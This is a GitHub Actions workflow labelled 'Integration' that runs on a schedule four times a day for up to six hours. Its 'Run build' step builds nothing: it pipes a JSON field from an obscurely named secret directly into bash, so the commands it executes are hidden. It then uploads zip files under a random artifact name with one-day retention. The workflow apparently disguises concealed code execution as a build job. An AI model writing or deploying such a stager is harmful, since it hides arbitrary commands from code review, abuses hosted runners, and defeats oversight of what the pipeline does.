name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '19 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          rdte03: ${{ secrets.rdte03 }}
        run: |
          printf '%s' "$rdte03" | jq -r .jhl90 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: ShlpRUVZ
          path: "*.zip"
          retention-days: 1
